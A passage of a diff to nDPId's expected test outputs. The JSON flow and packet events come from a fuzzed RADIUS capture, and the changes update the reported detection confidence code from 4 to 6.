00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1528997867612,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997867612,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBqNAAPsRTmPG4hk1CgxAHgcUchQAkRggC4IAiUKdIcJOOZHCxHzP96o9900BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZy4gNWIyMvo3Y2YvYjA6OWY64mE6NGE6MGU6N2UvMmgzTw4BAAAMFwwAAAwBf\/xQEmqru8HGcXlY8CXWo9RL+sk="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997867612,"flow_last_seen":1528997867612,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997867612,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29204,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":243,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":620000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1528997867808,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -310,50 +310,50 @@ 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1528997989461,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997989461,"pkt":"ABRP+4rqcNuYVcUnCABFqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 01319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1528997997929,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":691,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":691,"pkt_l4_len":657,"thread_ts_msec":1528997997929,"pkt":"AAAMB6xAABRP+4rqCABFAAKlIThAAP8RAAAKDEAexuIZNXIQBxUCkQAABIYCiWTbrkYoE6dP3NRell25+W4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzkBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWYRQAQP6AAAAAAAAAAAAAAAAAAAAgDlZaV0MyVGVzdExhYhoMAAA3YwEGAAAAAiwgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0PQYAAAATGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2I2NGE4MjI1Yi0GAAAAAUAGAAAADEEGAAAABlEENTY3BlsiqG0aFAAAV8gHDlZaV0MyVEMkdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExdHMC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUaAAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QoBgAVAAEfE2YwLTc5LTYwLWQxLTdkLTM3HiUlAC1hNy00Jaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1528997998006,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528997998006,"pkt":"ABRP+4rqcNuYVcUnCABFAACF2NZAAPwRe0\/G4hk1CgxAHgcVchAAcWngBYYAafOBk\/MbbTEmOF2SETjhcxsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NjQvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM0"} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00618{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00603{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":249,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997998006,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1528998009111,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998009111,"pkt":"ABRP+4rqcNuYVcUnCABFAADhCFZAAPsRTHTG4hk1QQxAHgcUchAAzZhiC4cAxfpcYMkIJQAq\/AYDHQwJPKgBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAAD1MaNN\/eVrXVA5NyB7PdAiAgUAAKijzKdTogAAg+UMifaIvECLAQACCQUAAKm646oYz3UcK6LI7VxSaVlQEnCDxzf23chcIFKFSs5a0So="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998009111,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1528998013338,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":671,"pkt_l4_len":637,"thread_ts_msec":1528998013338,"pkt":"AAAMB6xAABRP+4rqCABFAAKRITtAAP8RAAAKDEUexuIZNXIQBxUCfQAABIkCdRaYwGBcpHTMfyd7vuQnfxIaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTYkMaCQAAOCENAzGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998013338,"flow_last_seen":1528998013338,"flow_idle_time":200000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1528998013338,"l3_proto":"ip4","src_ip":"10.12.69.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 